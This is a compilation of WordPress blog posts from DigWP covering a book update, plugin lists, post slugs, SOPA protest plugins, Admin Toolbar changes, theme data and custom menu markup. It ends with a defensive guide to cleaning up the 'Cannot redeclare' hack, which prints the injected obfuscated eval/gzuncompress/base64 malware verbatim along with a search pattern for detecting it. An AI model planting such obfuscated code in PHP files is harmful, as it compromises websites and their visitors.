Sample page views from DiW 3.3

DiW 3.3 Features

Here are some of the highlights for the DiW 3.3 update:

• WordPress 3.2 & 3.3 – new chapter content covering the latest versions
• Refreshed graphics updated graphics and screenshots throughout the book–
• Restructured & streamlined – updated content for better flow & readability
• Hyperlinked chapters – all references to chapters & sections now hyperlinked
• Meta information – added to PDF versions (full, wide, & lite)
• Print & PDF – available in PDF and print editions (soon!)
• Updated widescreen version – new widescreen bonus version for large screens
• New Lite version – BONUS “lite” version of the PDF that’s more portable (for mobile/tablet devices)

Plus updated links, new popouts, plus tons of little tweaks and edits that synergize to improve overall quality and accuracy. The book reads, looks, and flows better than ever, giving you a richer, more rewarding WordPress experience.

For more details, visit the Errata & Changelog page. Current members can log in to the Members Area immediately to update the new version (for FREE). New to the book? Learn more and check out a demo.

Get the PDF

The PDF version is available now. For $27, you get over 400 pages of full-color WordPress action, plus free lifetime updates, exclusive themes, and everything else.

Already bought the book? Awesome. To get the new version, log into your account at our new Members Area and download at your convenience.

Early-Bird Special

This week you save $5 off the PDF using this discount code: WordPress2012

Just use that coupon during checkout to get Digging into WordPress v3.3 + all the trimmings for only $22. Discount good thru until the end of this week.

Printed Books

The print version is on the way! Here’s what we know so far:

• Spiral-bound, full-color printing (416 pages + cover)
• Each book includes a FREE copy of the PDF version
• Each book includes our exclusive themes, free lifetime updates, and all extras
• International shipping will be available for this edition

We don’t have any specific numbers or dates at this point, but we’ll post an announcement here at DigWP.com once specifics are available. We also have a notification list to receive an email once the new printed books are available.

New Korean Translation!

After much hard work, the team over at Webactually released a beautiful translated version of Digging into WordPress in the Korean language. They really did an excellent job putting everything together and customizing the experience for Korean readers. Here are some unofficial behind-the-scenes photos:

Click images for full-size views

Huge thanks to everyone at Webactually for making it happen. If you speak Korean, you can Learn more here!

Bonus Surprise!

Leave a comment for a chance to win a free printed copy of Digging into WordPress! As soon as the new books are in, we’ll pick a winner and send an all-expense-paid 9th Edition (including all the extraz). Good luck! :)

To get on the list, just leave a comment on this post and we’ll send you an email when the new v3.3 printed books are available for purchase.

For more info on the latest version, check out the announcement post.

Administration Tools

These plugins provide CMS-like functionality to the WordPress Admin area.

• WP-CMS Post Control — Provides complete control over the Write-Page and Write-Post areas of the WordPress Admin. Enables you to hide unwanted items, disable the Flash uploader, kill post revisions, and even add a personal message.
• WP-CMS — Transforms the Admin area to focus more on page creation and less on post creation. Designed to simplify the whole process for your newbie clients. You can even disable the blog functionality entirely.
• Flutter — Enables you to edit posts without leaving the post page and also provides custom write panels that enable further publishing functionality.
• Supple Forms — Enables you to create custom write panels, as well as format and insert values into posts using shortcodes and snippets of HTML.
• Custom Write Panel — Enables you to create additional write panels with customized input fields. Add textboxes, checkboxes, radio-buttons, dropdown menus, and more.
• Pods — Comprehensive CMS functionality, enabling you to create, manage, and display custom content types. Features automatic pagination, public-form filtering, access control, menu editing, and more.

User Role Management

• Members — Comprehensive user-, role-, and content-management plugin that was created to make WordPress a more powerful CMS. Provides more control over your blog with an extensive collection of component-based features.
• s2Member — s2Member provides robust tools for setting up a PayPal-driven membership site, including secure members-only content with custom roles and capabilities.
• Role Scoper — Provides you the ability to specify different permissions levels for different WordPress roles. Also provides options for implementing user groups.
• Disclose-Secret — Enables you to hide specified posts from users unless they meet certain criteria.
• Page Restrict — Enables you to restrict specified pages to logged-in users.

Ordering, Filtering, Limiting and Displaying Content

• AStickyPostOrderER — Enables you to customize post-display order for category views, archive views, and even sitewide.
• Advanced Category Excluder — Provides advanced content separation and category management for WordPress. Exclude any number of categories according to your needs. Also provides control over feeds and search results.
• Custom Post Limits — Provides control over the number of posts that appear on the home page, in various archive views, and in search results.
• Custom Query String Reloaded — Rework of the original plugin, CQS Reloaded controls the number of posts displayed on just about any type of page view, including archives, months, categories, home page, search, and many more. For more information on CQS Reloaded, check out the popout in section 5.1.4.

eCommerce and Shopping Carts

• eShop — Provides shopping-cart functionality that includes customizable product listings, multiple product options, advanced payment options, basic statistics, and more.
• WP e-Commerce — Provides an “elegant and easy to use fully featured shopping cart” that claims to be the “most complete and powerful Shopping Plugin you will find for WordPress.”
• YAK for WordPress — Provides basic shopping-cart functionality that associates products with blog posts.
• Quick Shop — Adds a sidebar widget that displays cart contents to the user and enables easy item removal. Also enables you to easily add products to your posts and pages.
• Cart66 Lite — Shopping cart plugin that enables you to sell digital and/or physical products with a host of useful options. Features include advanced shipping options, custom fields for products, customizable email receipts, Amazon S3 integration, and much more.

Email Mailing List and Newsletter Plugins

• WP-Campaign-Monitor — Email newsletter and SMS functionality enabling users to send campaigns, track results, and manage subscribers. Even includes a plug-n-play sidebar widget.
• PHPList Form Integration — Enables users to easily subscribe to your newsletter or RSS feed from any page on your blog. Designed to work with PHPList, an excellent open-source newsletter manager.
• WordPress Double Opt-In Manager Widget — Enables users to subscribe to your mailing list by way of a double opt-in method that includes the email form and a confirmation email.
• MailChimp — MailChimp is a third-party email newsletter sending service. They have an official plugin to help integrate with WordPress.

Miscellaneous CMS Plugins

• ProjectManager — Manage any number of projects with recurrent datasets. Great for portrait systems, music and DVD collections, and just about anything else imaginable.
• WP-PostRatings — Enables users to rate your post content. Highly customizable. One of the best.
• User Submitted Posts — Enables visitors to submit posts and images from anywhere on your site. User-submitted posts optionally include tags, categories, post title, URL and more.

Using WordPress as a Forum

Although forum functionality is not (yet) built into the WordPress core, implementing a forum on your site is easily accomplished with the help of these awesome plugins.

• bbPress Forum — bbPress is simple, fast, and elegant forum software from the same people who make WordPress. bbPress is focused on web standards, ease of use, ease of integration, and speed.
• Simple:Press Forum, aka Simple Forum — A feature-rich forum plugin for WordPress that fully integrates into your WordPress-powered site. Fully customizable and includes plenty of skins and icons to get you started.

More Forum Plugins

Here are two more useful forum plugins for WordPress, both include great features and look like great forum solutions.

• Tal.ki Embeddable Forums
• Zingiri Forum

What else?

Know of a sweet CMS-related plugin that needs mentioned? Shout it out in the comments to share with the community!

So when you type something like you see in the title of this post, with all the funky characters, or even just something like a comma, apostrophe, or semi-colon, WordPress 3.3+ works the magic and automatically creates your post slug without the junk.

Details.

It may not seem like a big deal, but previous versions of WordPress would include those funky characters when auto-creating your permalink slugs. If you glance at URLs while surfing around WordPress-powered sites, keep an eye on the URL in the address bar. It’s common to see all sorts of non-alphanumeric stuff in there.

Does it matter? I think so, for numerous reasons:

• Readability, consistency – simple alphanumeric URLs work great everywhere, no need to clutter them up with redundant information. For example, funky characters can choke URL-shortening services. Also: fewer characters, facilitates better comprehension.
• Safer – certain characters such as `, ^, ", ~, #, %, |, \, <, >, ", ~, [, ], {, }, and the blank space are considered as unsafe and should not be included in the URI (ie., always need encoded). Including them may seem to work, but you’re introducing sort of unknown variable into the mix, a potential vulnerability*
• SEO — do funky characters like blank spaces and percentage signs in the URL hurt your site’s SEO? Maybe not, but why put anything in there that isn’t a keyword?

So smarter auto-slugs in WordPress 3.3, another one of the finer details that improves the overall WP post-editing experience, and something you may not have noticed.

Bonus tip

Another sort of related “smarter-slugs” feature noticed while looking into it, is the automatic removal of the “-2” that WordPress automatically appends to the post slug when a duplicate is detected. So for example, say you’re working on a new post:

1. Create a post with a slug such as “test-post”
2. Delete the post and send to the Trash
3. Create another post with the same “test-post” slug
4. WordPress detects the duplicate post in the database and appends a “-2”, like so: test-post-2 to the post slug
5. Create yet another post with the same slug and WordPress will append a “-3”, and so on..

Nobody likes the “dash-twos” but they are required for the auto-creation of non-duplicate post slugs. What I just noticed with version 3.3 is that, once you empty the Trash, WordPress automagically removes the “-2” from the post slug, improving workflow to save you time. This may have changed in a previous version and I just hadn’t noticed, or it’s another one of the administrative refinements of WordPress 3.3.

Update: it looks like the -2 removal only applies to drafts and pending posts, not to posts that have already been published.. (see comment from Otto)

* More info on forbidden characters and blocking them

SOPA Blackout Plugin

“This plugin allows you to set SOPA blackout dates for your WordPress website, as well as a variety of options on who the anti-SOPA is shown too. You can have it shown instead of your site for any visitor, you can only show it the first time then let your visitors continue to the site, plus a lot more. This plugin is SEO friendly with temporary redirects being used.”

@ 8,516 downloads

SOPA Strike

“SOPA Strike will automatically redirect all users of your blog to the http://sopastrike.com homepage on Wednesday, January 18th. It automatically adds your blog name and URL to a list of protestors which will be featured on the website.”

@ 7,425 downloads

SOPA Blackout

“On the Tuesday 24th January 2012, the US Senate will vote on the internet censorship bill.
Whilst it is an American law, it has far reaching repurcusions for the web as a whole. Sites such as Reddit have said that on January 18th they are going to go dark between 8am and 8pm. This plugin will let you join the cause. On 18th January your site will display a customisable page. Search engine rankings will not be affected as the plugin sends a 503 status.”

@ 5,175 downloads

Stop SOPA Ribbon

“A black ribbon with the words “Stop SOPA” will be put on in the top right corner of your website, linking to the American Censorship website. Look at the screenshots to see how the ribbon looks. Check out the Help Stop SOPA/PIPA entry in the WordPress news too. Thank you for showing your support!”

@ 4,491 downloads

Go Dark

“This plugin enables websites to ‘go dark’ on January 18th with a customizable message and start/end times to protest SOPA/PIPA and Internet Censorship. It enables you to customize the message displayed on the front end, and optionally display either a stylized ‘Censored’ sign or seal. When ‘dark’ your website will return a 503 Service Temporarily Unavailable status code so as to not damage your search engine rankings, as well as specify the length of time for the visitor to try back after.”

@ 3,338 downloads

SOPA Blackout for WordPress

“The SOPA Blackout for WordPress plugin allows you to easily show your support on SOPA Blackout Day on your blog. Inserts the SOPA Blackout JavaScript file to your blog on SOPA Blackout day.”

@ 2,656 downloads

Simple Stop Sopa

“This Plugin will censor your site on January 18th between 8am and 8pm local time in protest of SOPA and PIPA. It has no admin settings and is super easy to use.”

@ 1,868 downloads

Stop SOPA Widget

“Defaults to show the Stop SOPA message on January 18th from 8am-8pm EST (1300-0100 UTC). Uses cookies so the message is only shown once Loaded asynchronously (won’t block the rendering of your page or cause another point of failure). You can manually trigger the modal before the 18th by adding the hash #stopsopa to the end of any URL on your site. Works across browsers (tested on everything from IE6 to iphone). Our hosted version is served from a CDN for speed/global delivery. Supports SSL. Hackable! Feel free to modify and update however you’d like.”

@ 1,606 downloads

Stop SOPA

“The plugin adds small protest box to your website. By default it’s collapsed, but once clicked, the Stop SOPA box appears. On settings page you can specify the position of the protest box: either at the right bottom corner or at the middle right edge. You also can turn on/off “Blackout Day” option. In this case website will show black screen (click demo link below to view the screenshot) and return 503 status (no problems with search engines) on 18th January 2012, 8:00AM – 8:00PM (server time). By placing this box on our WordPress websites we are protesting against of SOPA.”

@ 1,321 downloads

CENSOR ME

“This plugin is essentially an “off switch” for your website. When activated, the site is mostly blacked out by a banner for the americancensorship.org website. As the admin bar is left uncovered, all that is needed to reverse this is deactivating the plugin. Join many other WordPress sites in protesting censorship legislation being considered by the US Congress!”

@ 440 downloads

Stop SOPA by Zachary

“The site will look dark and will have just one spot of light. This spot of light will move with the mouse cursor, and the message will revealed.”

@ 29 downloads

Stop SOPA and PIPA Plugin

“an SEO Company developed this plugin which will schedule a temporary redirect for all your incoming WordPress blog traffic to the official Stop SOPA page, where people can cast their vote- Congress is about to pass internet censorship, even though the vast majority of Americans are opposed. We need to kill the bill – PIPA in the Senate and SOPA in the House – to protect our rights to free speech, privacy, and prosperity.”

@ 19 downloads

More info..

..is popping up everywhere! The Google Homepage is a great place to start, plus here are a couple of other resources:

• http://sopablackout.org/
• http://americancensorship.org/
• http://wordpress.org/news/2012/01/help-stop-sopa-pipa/

May the force be with us!

The WordPress 3.3 update focused heavily on streamlining and optimizing the Admin experience. The Admin Bar of WP 3.1 was intended as the “first step toward a front-end editor”. The original Admin Bar was debated for several good reasons:

• It’s enabled on the front-end by default
• Gobbles up too much vertical screen space
• It’s redundant, all links available elsewhere
• It’s not visually appealing in general

Using the many Admin Bar tricks that became available around the Web, WordPress users dealt with the thing in their own way and moved on with their lives. Some use plugins, some custom snippets & scripts, some just love it as-is. But now with the new 3.3 update, the big question is “what works and what doesn’t?” We’re glad you asked..

Admin Bar is dead, long live the Toolbar

If you’ve updated to WP 3.3, you’ve seen the smaller “Toolbar” tucked neat above the Admin area. The new Admin Bar Toolbar seems to address some of the main concerns about the old Admin Bar:

• No longer enabled on front-end by default
• Uses less vertical screen space
• Integrates the Admin header area, so no longer redundant
• It looks a little better (in my opinion)

For those who have not yet updated or have no idea what’s going on, here is a visual comparison of the old “Admin Bar” and the new “Toolbar”:

Admin Bar: bigger, clunkier, and redundant

Toolbar: smaller, simpler, and required

The new Toolbar certainly looks better, but concerns remain. From what I’ve gathered, the main gripe is that the Toolbar is mandatory, and possibly still redundant, depending on site setup and configuration (plugins, networks, etc.). Is it really mandatory? That sounds silly to me, but seems to be the case:

User Profile settings for the old Admin Bar: full control

User Profile settings for the Toolbar: bamboozled! No option to disable for back-end

So yeah, something changed, so the question for the Admin Toolbar is “what works and what doesn’t?” Let’s dig in and see what’s up..

Admin Bar changes, now WP Toolbar

As Ipstenu puts it: “You don’t have to like it, but it’s here to stay.” So it’s time to look at things practically and get on with it. First of all, if you have a plugin or functions script that hides, removes, or customizes the Admin Bar, definitely investigate to see if everything is still working according to plan.

What works..

After some testing, we’ve seen the following functions.php snippets continue to work in WordPress version 3.3:

// disable the admin bar (front end only) show_admin_bar(false); // disable the admin bar (front end only) add_filter('show_admin_bar', '__return_false');

In WP 3.1, these functions hid the Admin Bar on both sides of the fence — front end & back end. In WP 3.3+, these snippets will hide the Admin Toolbar only on the front-end of your site (the public side). Likewise, this snippet of CSS added to your theme’s style.css file hides the Toolbar on the front-end:

/* hide the admin bar (front end only) */ #wpadminbar { display:none; }

Keep in mind that, when using the CSS method, the Toolbar markup is still present in the source code, but will not be displayed in the browser.

Here is another useful snippet for disabling the Toolbar for lesser users:

// show admin bar only for admins if (!current_user_can('manage_options')) { add_filter('show_admin_bar', '__return_false'); } // show admin bar only for admins and editors if (!current_user_can('edit_posts')) { add_filter('show_admin_bar', '__return_false'); }

Note that this also only applies to Toolbar display on the front-end.

What doesn’t work..

Basically the show_admin_bar() function seems to work as it did before version 3.3, except that now the Toolbar is integral to the Admin area, so disabling it using the previous functions works only on the front-end of your site. So tricks like this stopped working:

If you’re running WP 3.1+ or 3.2+ (not 3.3+), then show_admin_bar() will continue to disable the Admin Bar on both front and back ends of WordPress.

Admin Bar plugins

In our book, we provide a list of plugins to help with customizing the 3.1 Admin Bar. Now working on the DiW 3.3 update, it’s time to check these plugins for compatibility with WordPress 3.3. Here are the results:

• Admin Bar Remover — disables Toolbar on front-end only
• Admin Bar Removal — doesn’t work in WP 3.3+
• Admin Bar Disabler — disables Toolbar on front-end only
• Admin Bar Minimiser — hides/minimizes Toolbar on both sides of WP 3.3, but looks weird because of the existing Admin design. Also, in the Admin the hover/toggle button is invisible.
• Global Hide/Remove Admin Bar Plugin — removes the User Profile Toolbar settings and removes Toolbar on front-end only
• Hide Admin Bar Search — there is no search bar in WP 3.3
• Stick Admin Bar To Bottom — works great on both sides of WP 3.3
• WP Custom Admin Bar — didn’t seem to work..
• Always show admin bar — works in 3.3 but applies only to front-end
• Update: Ultimate Admin Bar — puts it all in the Toolbar to further optimize your workflow

If you know of others, shout em out and I’ll update the post.

To be continued..

Without a doubt things will continue to change, and it’ll be fun watching as WordPress continues to evolve, Toolbar and all :)

HTML or XHTML for Markup?

When the poll started in April 2010, the results were tied closely between HTML5 and XHTML 1.0, and it stayed that way through most of 2010 and into this year. Over the course of 2011, HTML5 has clearly pulled ahead as the winner, with 33% of all votes.

I think it’s great to see HTML5 continue to hit the mainstream, a trend that will hopefully continue into the New Year. We’re gonna let this poll ride on and will report back later to see what’s up.

Love or Hate the WordPress Admin Bar?

The next poll we opened up was all about the new Admin Bar functionality included with WordPress 3.1. In addition to posting some useful Admin Bar Tricks, we asked readers how they felt about the new WordPress Admin Bar. The results currently show more people “hating it” than “loving it”:

These results have pretty much been consistent over time, with “Love it” finally pulling ahead of “Don’t care” within the past few months. You gotta keep in mind how utterly unscientific these types of polls are, but it’s also amusing to note that there is no option to disable the new, slimmer Admin Bar included in the WordPress 3.3 release.

Best Caching Plugin for WordPress?

Perhaps not as surprising for seasoned WordPress users, but our poll on the best caching plugin for WordPress provides a useful look into what WP folk are using to cache their content, based on 2,465 votes so far.

So the top three caching plugins according these results are W3 Total Cache (45%), WP Super Cache (34%), and then Hyper Cache ties with “Other” at around 6% of votes. I’m thinking based on comments and feedback that the Other plugin people were voting for is Quick Cache. Let me know if there are others that should be mentioned.

Guest authors wanted

With everything going on, it’s a challenge to keep the sweet posts coming, so we’re opening the doors to guest authors. If you’re into WordPress and would like to share some WordPress knowledge with our growing audience, drop a line to get started.

News about the book..

Print editions of the current version of Digging into WordPress are officially sold out. The plan is to update the book for WordPress 3.3 in January, release the PDF update, and then order a fresh batch of printed books. No idea about the cost of the new books at this point, but if at all possible will remain the same. This will be the 9th major revision of the book, and if you already own a copy, the e-update is 100% free. We’ll set up a form to pre-order the book once everything is underway. Stay tuned!

get_theme_data()

The function that makes it possible is called get_theme_data(), and it simply returns an array of information about any of your theme files. Here is how it’s used in your theme template:

<?php get_theme_data( $theme_filename ); ?>

So $theme_filename is required and should be the path and filename of your theme’s style.css file. There is no default value for this, so you need to ensure a proper value.

So what information can you display with get_theme_data()? The function returns an array of values that basically comprises the different meta items in your stylesheet. Here is a list of possible return values (all strings):

• Name – theme name
• Title – either theme name or linked theme name
• URI – theme URI
• Description – wptexturized version of the theme name
• AuthorURI – theme author URI
• Template – theme parent template, if exists
• Version – theme version number
• Status – theme status (default: publish)
• Tags – theme tags
• Author – author name or linked author name

Note that these return values are case-sensitive and will not work if the first letter is not capitalized.

Examples

The Codex provides this example for getting and displaying the theme Name and Author:

<?php

    /*
     * Assign theme folder name that you want to get information.
     * make sure theme exist in wp-content/themes/ folder.
     */

    $theme_name = 'twentyeleven'; 

   /*
    * Do not use get_stylesheet_uri() as $theme_filename,
    * it will result in PHP fopen error if allow_url_fopen is set to Off in php.ini,
    * which is what most shared hosting does. You can use get_stylesheet_directory()
    * or get_template_directory() though, because they return local paths.
    */

    $theme_data = get_theme_data( get_theme_root() . '/' . $theme_name . '/style.css' );
    echo $theme_data['Title'];
    echo $theme_data['Author'];

?>

This should get you going.. just copy/paste into your theme template and indicate the theme name in that first line of code. Displaying other bits of theme data is matter of editing/replicating those last two lines.

Once you see how it works, you can do cool stuff with it, like display your theme’s version number sort of globally throughout your site. I’m using this technique to append version parameters to my stylesheet URLs, like so:

<link rel="stylesheet" href="<?php bloginfo('stylesheet_directory'); ?>/style.css<?php if(function_exists('theme_version')) theme_version(); ?>">

..and the output markup looks like this (notice the appended version parameter, ?v=1.3):

<link rel="stylesheet" href="http://example.com/wp-content/themes/xycss/style.css?v=1.3">

Because I am using multiple stylesheets, this method really saves a LOT of time trying to keep track of everything. Here is the theme_version() function that goes in your theme’s functions.php file:

// display version number
function theme_version() {
    $theme_name = 'xycss'; // customize with your theme name
    $theme_data = get_theme_data( get_theme_root() . '/' . $theme_name . '/style.css' );
    echo '?v=' . $theme_data['Version'];
}

And with a few modifications, you can also display your theme’s information in your posts and pages via shortcode:

// version number shortcode
function theme_version_shortcode() {
    $theme_name = 'xycss'; // customize with your theme name
    $theme_data = get_theme_data( get_theme_root() . '/' . $theme_name . '/style.css' );
    return $theme_data['Version'];
}
add_shortcode('theme_version', 'theme_version_shortcode');

With that second snippet in your functions.php file, displaying your theme info directly in pages is as easy as writing this:

[theme_version]

..and the output:

1.3

It’s pretty cool stuff, and I’m sure there’s tons more you can do with it too. If you know any tricks or tips, please share in the comments, Thanks :)

Customizing HTML displayed with wp_nav_menu()

By default, WordPress custom menus are displayed in your theme template using the wp_nav_menu function, which by default outputs markup that looks like this:

<div class="menu-test-container"><ul id="menu-test" class="menu"><li id="menu-item-6" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-6"><a href="http://example.com/">Home</a></li>
<li id="menu-item-7" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7"><a href="http://example.com/demos/">Demos</a></li>
<li id="menu-item-8" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8"><a href="http://example.com/downloads/">Downloads</a></li>
<li id="menu-item-9" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9"><a href="http://example.com/docs/">Documentation</a></li>
</ul></div>

That’s a mess of class and id attributes, plus an extra <div> container to boot. Fortunately, the wp_nav_menu() provides some useful parameters for customizing the display of your custom navigation menus. Here is a list of the default parameters:

<?php $defaults = array(
  'theme_location'  => ,
  'menu'            => , 
  'container'       => 'div', 
  'container_class' => 'menu-{menu slug}-container', 
  'container_id'    => ,
  'menu_class'      => 'menu', 
  'menu_id'         => ,
  'echo'            => true,
  'fallback_cb'     => 'wp_page_menu',
  'before'          => ,
  'after'           => ,
  'link_before'     => ,
  'link_after'      => ,
  'items_wrap'      => '<ul id=\"%1$s\" class=\"%2$s\">%3$s</ul>',
  'depth'           => 0,
  'walker'          => );
?>

Of these parameters, $container lets you specify how to wrap the <ul> element, using either 'div', 'nav', or false. So by specifying false for the $container parameter, we can simplify markup by removing the <div> container. The wp_nav_menu function also provides two more optional parameters for customizing menu markup:

• $items_wrap – “Whatever to wrap the items with an ul, and how to wrap them with” (source: WP Codex)
• $walker – “Custom walker object to use (Note: You must pass an actual object to use, not a string)” (source: WP Codex)

These sound useful, but I haven’t had much luck with either. The $items_wrap didn’t seem to do anything, but there are plenty of custom walker scripts available for further experimentation and customization. If you can get them to work properly, a custom walker provides complete control over custom-menu markup displayed with the wp_nav_menu tag. Unfortunately, I was unable to get very far with any of them, so I sought an alternate method..

An alternative approach for custom markup

After fiddling with a few of the various custom walkers, I decided to find an easier way to customize and format WordPress nav/menu markup. The walkers are fairly extensive and complex, and just seem like overkill for building a simple list of custom menu items. After some digging through the WordPress Codex, I found the perfect function for crafting squeaky-clean WordPress menus: wp_get_nav_menu_items. As the name implies, wp_get_nav_menu_items returns the items from your custom navigation menus (as created in the WP Admin → Appearance → Menus panel). Thus, you can use this function to mark up your custom menus however you want. For my particular project, the desired format looks like this:

<nav>
	<ul>
		<li><a href="http://example.com/">Home</a></li>
		<li><a href="http://example.com/demos/">Demos</a></li>
		<li><a href="http://example.com/downloads/">Downloads</a></li>
		<li><a href="http://example.com/docs/">Documentation</a></li>
	</ul>
</nav>

Trying to do this with the commonly used wp_nav_menu function and a custom walker is possible, but it’s much easier building the menu structure from scratch, using only what’s required to make it happen. So alternately we use wp_get_nav_menu_items and begin with the example function provided at the Codex. After wrapping it in a function and customizing the output, we have the clean_custom_menus() function, ready for copy/paste into your theme’s functions.php file:

// custom menu example @ http://digwp.com/2011/11/html-formatting-custom-menus/
function clean_custom_menus() {
	$menu_name = 'nav-primary'; // specify custom menu slug
	if (($locations = get_nav_menu_locations()) && isset($locations[$menu_name])) {
		$menu = wp_get_nav_menu_object($locations[$menu_name]);
		$menu_items = wp_get_nav_menu_items($menu->term_id);

		$menu_list = '<nav>' ."\n";
		$menu_list .= "\t\t\t\t". '<ul>' ."\n";
		foreach ((array) $menu_items as $key => $menu_item) {
			$title = $menu_item->title;
			$url = $menu_item->url;
			$menu_list .= "\t\t\t\t\t". '<li><a href="'. $url .'">'. $title .'</a></li>' ."\n";
		}
		$menu_list .= "\t\t\t\t". '</ul>' ."\n";
		$menu_list .= "\t\t\t". '</nav>' ."\n";
	} else {
		// $menu_list = '<!-- no list defined -->';
	}
	echo $menu_list;
}

After placing in your functions.php file, you can call the function and display your custom menus anywhere in your theme by calling it directly:

<?php if (function_exists(clean_custom_menus())) clean_custom_menus(); ?>

Then, you can customize the clean_custom_menus() function as follows:

1. Line 3: specify your custom-menu slug
2. Lines 8 thru 15: customize markup, tabs, and line breaks as needed
3. Line 17: uncomment else condition and customize if needed

For lines 8-15, anything is possible – you can include whatever list items, markup, and attributes required. Additionally, you can tab and indent markup to line up with page markup using \n for a new line and \t for a tab space. The fastest, easiest way to use this function is to copy/paste into your theme and then check out your list markup. For example, if the nav list is too far to the left, add some more tabs. You can also add class and id attributes, include custom items, and even manipulate which list items are displayed ($url, $title, etc.). After a little fine-tuning, the wp_get_nav_menu_items() function enables clean, well-formatted markup for your custom menus.

Quick Summary

In this article, we explain two ways to clean up and customize WordPress’ custom-menu markup. Either of these methods will take your code from this:

<div class="menu-test-container"><ul id="menu-test" class="menu"><li id="menu-item-6" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-6"><a href="http://example.com/">Home</a></li>
<li id="menu-item-7" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7"><a href="http://example.com/demos/">Demos</a></li>
<li id="menu-item-8" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8"><a href="http://example.com/downloads/">Downloads</a></li>
<li id="menu-item-9" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-9"><a href="http://example.com/docs/">Documentation</a></li>
</ul></div>

..to this:

<nav>
	<ul>
		<li><a href="http://example.com/">Home</a></li>
		<li><a href="http://example.com/demos/">Demos</a></li>
		<li><a href="http://example.com/downloads/">Downloads</a></li>
		<li><a href="http://example.com/docs/">Documentation</a></li>
	</ul>
</nav>

..or whatever HTML structure that’s required. You can achieve this with either of these methods:

• Combine wp_nav_menu() with a custom walker class
• Combine wp_get_nav_menu_items() with the clean_custom_menus() function

As usual, if you know of better ways of doing something, please share in the comments! Thanks for reading Digging into WordPress :)

Checking for the “Cannot redeclare” hack

The good news is that the hack is easy to diagnose. Just open any page from your site and look for the following PHP error message:

Fatal error: Cannot redeclare _765258526() 
(previously declared in /path/to/www/wp-content/themes/THEME/footer.php(12) 
: eval()'d code:1) in /path/to/www/index.php(18) 
: eval()'d code on line 1

PHP errors like this are usually located at the bottom of the web page, but may appear elsewhere or even not all in some cases (i.e., proper configuration). To be certain, scan your server’s PHP error logs for the “Cannot redeclare” error string. If you find anything that matches, it’s time to fix your site..

About the “Cannot redeclare” hack

If your site’s been hit with “Cannot redeclare”, you’re in for a wild clean-up party because it infects every index.php and footer.php file for every WordPress site on the server.

For example, my client hosted 11 sites on the same shared account, so multiply that by the number of index and footer files used by WordPress (core files and themes) and you get over 200 hacked files to clean up. Needless to say the client’s sites have been moved to a more secure location.

Fortunately finding the hacked index files is relatively painless, just search all files on your server for the following phrase:

eval(gzun

Here is a screenshot showing search results for this phrase:

As seen here, the hacked files should be easy to recognize because they:

• include the eval(gzun search term
• include long strings of encoded gibberish
• consist of index.php and footer.php files

If your search turns up anything that similar but not quite what we’re talking about here, it may or may not be legit. The main thing that we’re looking for are the long strings of encoded nonsense. Also, remember to check all sites that you may have on the same server. Once you’ve isolated the infected files, it’s time to clean ‘em up..

Removing the “Cannot redeclare” hack

Looking at any of the hacked files, you’ll find this hideous looking piece of code garbage:

<?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM=')));  eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J1VBJjFbJjNW0rgUAqDUUxQ==')));  eval(gzuncompress(base64_decode('eF6VlMmyo0YURPeO8D94192hhQokhBSOXhSjmAoVVYDQxoGYJzFKAr7ez257Ya/6/UDevHkyMnmF9ddsfT6itumGZBy/3sMxOez/iJOojZOvXxKFo1GazvHOBGLA+eUaLVZpzajUZhTU15L3GFPsjAFRPMEAFudWy/H371++ffv2+2+//pL8xAHTODKmOT6slbE1tOJ1kiCDyoCxphgvMRm9qgExefekX133El0ismOkqGKP42MZLpKJpPMS8YTx4gSYVTsZZGe4IDdMec9Y+/pC3J1NwcNz5cbyxsZi7uQpYBHw88T+MPqTTulClndJI2Dx+I1owCJqXi0kAiGDr1PmpH+r/aTW/2IFVglZi6osknzT22+Yfz8mcjvS0l0L96TTiLuQ2MMek2IXbPSj2KrAO+ddAXvjWLWGHMfuyQrhhdkqAvz+CT+ojEYjqyB0rlslDwURXHJ71jw323da2R40mRpdS4G7wsjZXqfQjIck2hxOHc/bz77v+puTkrDPFsMoxgdVLn5dNCpjnotZMiFZKLX3LSu/xWPgnXXxxd2UgOtMuStvykbQOS04ZZINfXx9sg9l5G6GtgVvWJSG0uT8cr4x+pmL+C29MFouyy5VgBmk9WCjtJIuBwvaskyLo/De1BNIvYk6O/3liRUSN4tenILmuXaHUeqGNR7ouqyfyIb+1agxALuPZs5o1dYP9iuzSthDwkcnZgxky0cQ63OW8ELrc0LllmTOu7k3emSFNcicuCO11t2flxdnl3QngmRY8ipQ5yJo5i6sb69zN06yOgr1ja6SUyJPRVYU123gNYPkwhyM6zP7/hmmDAXA/GCKt2SMs9rXRPOUifjEuvCkhqLQ52ZxkHutKdrzZvO4+yIcdsdp/z5uwlMT7sqre/Bjns096xq4ppgfSHNomHt645A8tnLo1wPeKjUWwzM6Fy6801J9qwOWfUExd9U2eVAOZElU3Vc+2pdeJGosX+U022iZa0nW/LCIQLZPbjs0Rac9tmGfK+oW7k1LsaGMWZvsxuV9LSZ3/CDdQqpA6oCMr7F+OQDN42VrNztRLVGmOi9TZL02hmort/2iyAtvpWu7CtvHXihvbeyNn8nuv6vEBwCVFjuWGDCepDPG7JO788/0Obhcsd2DeRlXYhQvsSfZsjOV63USOcMk1bTUSCPFbCNq6xTUaK1OOuMJeqnc9RL5YMhciGs39OFn+PImRQj/d0cSdpLw+uFztQLmWu4BWyAXinlxV53ppnZdr6p5H9bhoKtpsK/1p2o8c7fu3ZZtENnLjisrS95ya6iLlxQIWqoLA1ELfAUFbpnNu2GfmFa1E5Lu+YrCNimZ6OyxMGmHhWwRwSIv9dFR9ryN1h02Q8pmGjVsNrsdOMNpBat/t0oYvWgkq/vhjiWxSxuuow+lR+virP659Lri9uDEEdZeK0HFT0Ig/8jlTymmN/I='))); ?>

